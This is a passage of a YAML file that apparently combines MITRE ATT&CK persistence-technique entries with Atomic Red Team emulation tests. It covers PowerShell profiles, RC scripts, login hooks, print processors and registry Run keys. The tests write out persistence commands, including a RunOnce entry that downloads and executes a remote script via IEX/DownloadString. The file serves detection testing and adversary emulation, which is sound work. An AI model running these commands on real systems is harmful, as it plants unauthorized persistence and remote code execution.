when it is launched. 
(Citation: ESET Turla PowerShell May 2019) + \n\nAn adversary may also be able to escalate privileges if a script in a + PowerShell profile is loaded and executed by an account with higher privileges, + such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)" + id: attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T21:31:31.082Z' + created: '2020-01-24T15:11:02.758Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include: + + * $PsHome\Profile.ps1 + * $PsHome\Microsoft.{HostProgram}_profile.ps1 + * $Home\My Documents\PowerShell\Profile.ps1 + * $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1 + + Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Creation' + x_mitre_contributors: + - Allen DeRyke, ICE + x_mitre_platforms: + - Windows + identifier: T1546.013 + atomic_tests: + - name: Append malicious start-process cmdlet + auto_generated_guid: '090e5aa5-32b6-473b-a49b-21e843a56896' + description: 'Appends a start process cmdlet to the current user''s powershell + profile pofile that points to a malicious executable. Upon execution, calc.exe + will be launched. 
+ +' + supported_platforms: + - windows + input_arguments: + exe_path: + description: Path the malicious executable + type: Path + default: calc.exe + ps_profile: + description: Powershell profile to use + type: String + default: "$profile" + dependency_executor_name: powershell + dependencies: + - description: 'Ensure a powershell profile exists for the current user + +' + prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} + +' + get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force + +' + executor: + command: | + Add-Content #{ps_profile} -Value "" + Add-Content #{ps_profile} -Value "Start-Process #{exe_path}" + powershell -Command exit + cleanup_command: | + $oldprofile = cat $profile | Select-Object -skiplast 1 + Set-Content $profile -Value $oldprofile + name: powershell + T1542: + technique: + id: attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e + description: |- + Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting) + + Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses. + name: Pre-OS Boot + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1542 + url: https://attack.mitre.org/techniques/T1542 + - source_name: Wikipedia Booting + url: https://en.wikipedia.org/wiki/Booting + description: Wikipedia. (n.d.). 
Booting. Retrieved November 13, 2019. + - url: https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html + description: Pinola, M. (2014, December 14). 3 tools to check your hard drive's + health and make sure it's not already dying on you. Retrieved October 2, + 2018. + source_name: ITWorld Hard Disk Health Dec 2014 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-10-22T16:35:54.740Z' + created: '2019-11-13T14:44:49.439Z' + x_mitre_platforms: + - Linux + - Windows + - Network + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + - 'Firmware: Firmware Modification' + - 'Driver: Driver Metadata' + - 'Process: OS API Execution' + - 'Drive: Drive Modification' + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_defense_bypassed: + - Anti-virus + - Host intrusion prevention systems + - File monitoring + x_mitre_version: '1.1' + x_mitre_detection: |- + Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching. + + Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. 
(Citation: ITWorld Hard Disk Health Dec 2014) + x_mitre_is_subtechnique: false + atomic_tests: [] + T1547.012: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.012 + url: https://attack.mitre.org/techniques/T1547/012 + - source_name: Microsoft AddPrintProcessor May 2018 + url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor + description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved + October 5, 2020. + - source_name: ESET PipeMon May 2020 + url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ + description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti + Group. Retrieved August 24, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Print Processors + description: "Adversaries may abuse print processors to run malicious DLLs during + system boot for persistence and/or privilege escalation. Print processors + are DLLs that are loaded by the print spooler service, spoolsv.exe, during + boot. \n\nAdversaries may abuse the print spooler service by adding print + processors that load malicious DLLs at startup. A print processor can be installed + through the AddPrintProcessor API call with an account that has + SeLoadDriverPrivilege enabled. Alternatively, a print processor + can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet + or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: + e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry + key that points to the DLL. 
For the print processor to be correctly installed, + it must be located in the system print-processor directory that can be found + with the GetPrintProcessorDirectory API call.(Citation: Microsoft + AddPrintProcessor May 2018) After the print processors are installed, the + print spooler service, which starts during boot, must be restarted in order + for them to run.(Citation: ESET PipeMon May 2020) The print spooler service + runs under SYSTEM level permissions, therefore print processors installed + by an adversary may run under elevated privileges." + id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T16:05:36.344Z' + created: '2020-10-05T13:24:49.780Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations. + + Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious. 
+ x_mitre_data_sources: + - 'File: File Creation' + - 'Process: OS API Execution' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + x_mitre_contributors: + - Mathieu Tartare, ESET + x_mitre_platforms: + - Windows + atomic_tests: [] + T1037.004: + technique: + id: attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211 + description: |- + Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. + + Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. + + Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) + + Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). 
(Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc) + name: RC Scripts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1037.004 + url: https://attack.mitre.org/techniques/T1037/004 + - source_name: IranThreats Kittens Dec 2017 + url: https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/ + description: Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, + A Case of Ambiguity and Shared Code. Retrieved May 28, 2020. + - description: Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted + Linux Systems. Retrieved June 24, 2019. + url: https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/ + source_name: Intezer HiddenWasp Map 2019 + - source_name: intezer-kaiji-malware + url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/ + description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware + turning to Golang. Retrieved December 17, 2020.' + - source_name: Apple Developer Doco Archive Launchd + url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (2016, September 13). Daemons and Services Programming + Guide - Creating Launch Daemons and Agents. Retrieved February 24, 2021. + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html + description: Apple. 
(2016, September 13). Startup Items. Retrieved July 11, + 2017. + source_name: Startup Items + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - source_name: Ubuntu Manpage systemd rc + url: http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html + description: Canonical Ltd.. (n.d.). systemd-rc-local-generator - Compatibility + generator for starting /etc/rc.local and /usr/sbin/halt.local during + boot and shutdown. Retrieved February 23, 2021. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-27T19:58:01.927Z' + created: '2020-01-15T16:25:22.260Z' + x_mitre_platforms: + - macOS + - Linux + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: "Monitor for unexpected changes to RC scripts in the /etc/ + directory. Monitor process execution resulting from RC scripts for unusual + or unknown applications or behavior.\n\nMonitor for /etc/rc.local + file creation. Although types of RC scripts vary for each Unix-like distribution, + several execute /etc/rc.local if present. 
" + x_mitre_permissions_required: + - root + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + identifier: T1037.004 + atomic_tests: + - name: rc.common + auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de + description: | + Modify rc.common + + [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) + supported_platforms: + - macos + executor: + command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello + World"'' >> /etc/rc.common + +' + elevation_required: true + name: bash + T1542.004: + technique: + created: '2020-10-20T00:05:48.790Z' + modified: '2020-10-22T02:18:19.568Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc + description: |- + Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks) + + + ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect. 
+ name: ROMMONkit + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1542.004 + url: https://attack.mitre.org/techniques/T1542/004 + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + x_mitre_platforms: + - Network + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_detection: There are no documented means for defenders to validate the + operation of the ROMMON outside of vendor support. If a network device is + suspected of being compromised, contact the vendor to assist in further investigation. + x_mitre_permissions_required: + - Administrator + x_mitre_data_sources: + - 'Firmware: Firmware Modification' + atomic_tests: [] + T1547.007: + technique: + created: '2020-01-24T18:15:06.641Z' + modified: '2020-01-24T19:51:37.795Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e + description: "Adversaries may modify plist files to automatically run an application + when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain + applications to be re-opened when a user logs into their machine after reboot. 
+ While this is usually done via a Graphical User Interface (GUI) on an app-by-app + basis, there are property list files (plist) that contain this information + as well located at ~/Library/Preferences/com.apple.loginwindow.plist + and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. + \n\nAn adversary can modify one of these files directly to include a link + to their malicious executable to provide a persistence mechanism each time + the user reboots their machine (Citation: Methods of Mac Malware Persistence)." + name: Re-opened Applications + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.007 + url: https://attack.mitre.org/techniques/T1547/007 + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + x_mitre_platforms: + - macOS + x_mitre_data_sources: + - 'File: File Modification' + - 'Command: Command Execution' + x_mitre_detection: Monitoring the specific plist files associated with reopening + applications can indicate when an application has registered itself to be + reopened. + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1547.007 + atomic_tests: + - name: Re-Opened Applications + auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba + description: | + Plist Method + + [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + supported_platforms: + - macos + executor: + steps: | + 1. 
create a custom plist: + + ~/Library/Preferences/com.apple.loginwindow.plist + + or + + ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist + name: manual + - name: Re-Opened Applications + auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb + description: | + Mac Defaults + + [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + supported_platforms: + - macos + input_arguments: + script: + description: path to script + type: path + default: "/path/to/script" + executor: + command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} + +' + cleanup: 'sudo defaults delete com.apple.loginwindow LoginHook + +' + elevation_required: true + name: sh + T1108: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1108 + url: https://attack.mitre.org/techniques/T1108 + - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf + description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage + Units. Retrieved July 18, 2016. + source_name: Mandiant APT1 + description: "**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), + [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External + Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**\n\nAdversaries + may use more than one remote access tool with varying command and control + protocols or credentialed access to remote services so they can maintain access + if an access mechanism is detected or mitigated. \n\nIf one type of tool is + detected and blocked or removed as a response but the organization did not + gain a full understanding of the adversary's tools and access, then the adversary + will be able to retain access to the network. 
Adversaries may also attempt + to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) + to use [External Remote Services](https://attack.mitre.org/techniques/T1133) + such as external VPNs as a way to maintain access despite interruptions to + remote access tools deployed within a target network.(Citation: Mandiant APT1) + Adversaries may also retain access through cloud-based infrastructure and + applications.\n\nUse of a [Web Shell](https://attack.mitre.org/techniques/T1100) + is one such way to maintain access to a network through an externally accessible + Web server." + name: Redundant Access + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--6aabc5ec-eae6-422c-8311-38d45ee9838a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-08T10:33:00.985Z' + created: '2017-05-31T21:31:18.867Z' + x_mitre_deprecated: true + x_mitre_is_subtechnique: false + x_mitre_version: '3.1' + x_mitre_defense_bypassed: + - Network intrusion detection system + - Anti-virus + x_mitre_detection: |- + Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost. + + Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators. 
+ + If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation. + + For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information. + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS + - Linux + - macOS + x_mitre_permissions_required: + - User + - Administrator + - SYSTEM + x_mitre_contributors: + - Praetorian + atomic_tests: [] + T1547.001: + technique: + id: attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279 + description: |- + Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. + + Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. 
+ + The following run keys are created by default on Windows systems: + + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce + + Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) + + The following Registry keys can be used to set startup folder items for persistence: + + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders + * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders + * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders + + The following Registry keys can control automatic startup of services during boot: + + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices + + Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: + + * 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run + + The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs. + + Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on. + + By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. + + Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. + name: Registry Run Keys / Startup Folder + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.001 + url: https://attack.mitre.org/techniques/T1547/001 + - external_id: CAPEC-270 + source_name: capec + url: https://capec.mitre.org/data/definitions/270.html + - url: http://msdn.microsoft.com/en-us/library/aa376977 + description: Microsoft. 
(n.d.). Run and RunOnce Registry Keys. Retrieved November + 12, 2014. + source_name: Microsoft Run Key + - source_name: Microsoft Wow6432Node 2018 + url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry + description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data + in the Registry. Retrieved August 3, 2020. + - source_name: Malwarebytes Wow6432Node 2016 + url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ + description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved + August 3, 2020. + - url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key + description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry + Key. Retrieved June 29, 2018. + source_name: Microsoft RunOnceEx APR 2018 + - url: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ + description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden + from Autoruns.exe. Retrieved June 29, 2018. + source_name: Oddvar Moe RunOnceEx Mar 2018 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. 
+ source_name: TechNet Autoruns + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-01-06T18:36:29.226Z' + created: '2020-01-23T22:02:48.566Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Oddvar Moe, @oddvarmoe + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_detection: |- + Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. + + Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1547.001 + atomic_tests: + - name: Reg Key Run + auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05 + description: "Run Key Persistence\n\nUpon successful execution, cmd.exe will + modify the registry by adding \\\"Atomic Red Team\\\" to the Run key. Output + will be via stdout. 
\n" + supported_platforms: + - windows + input_arguments: + command_to_execute: + description: Thing to Run + type: Path + default: C:\Path\AtomicRedTeam.exe + executor: + command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V + "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" + +' + cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" + /V "Atomic Red Team" /f >nul 2>&1 + +' + name: command_prompt + - name: Reg Key RunOnce + auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb + description: "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe + will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will + be via stdout. \n" + supported_platforms: + - windows + input_arguments: + thing_to_execute: + description: Thing to Run + type: Path + default: C:\Path\AtomicRedTeam.dll + executor: + command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend + /v 1 /d "#{thing_to_execute}" + +' + cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend + /v 1 /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: PowerShell Registry RunOnce + auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42 + description: | + RunOnce Key Persistence via PowerShell + Upon successful execution, a new entry will be added to the runonce item in the registry. 
+ supported_platforms: + - windows + input_arguments: + thing_to_execute: + description: Thing to Run + type: Path + default: powershell.exe + reg_key_path: + description: Path to registry key to update + type: Path + default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce + executor: + command: | + $RunOnceKey = "#{reg_key_path}" + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' + cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" + -Force -ErrorAction Ignore + +' + name: powershell + elevation_required: true + - name: Suspicious vbs file run from startup Folder + auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 + description: "vbs files can be placed in and ran from the startup folder to + maintain persistance. Upon execution, \"T1547.001 Hello, World VBS!\" will + be displayed twice. 
\nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start + Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted + and the user logs in.\n" + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" + Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" + cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" + cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore + Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Suspicious jse file run from startup Folder + auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06 + description: "jse files can be placed in and ran from the startup folder to + maintain persistance.\nUpon execution, \"T1547.001 Hello, World JSE!\" will + be displayed 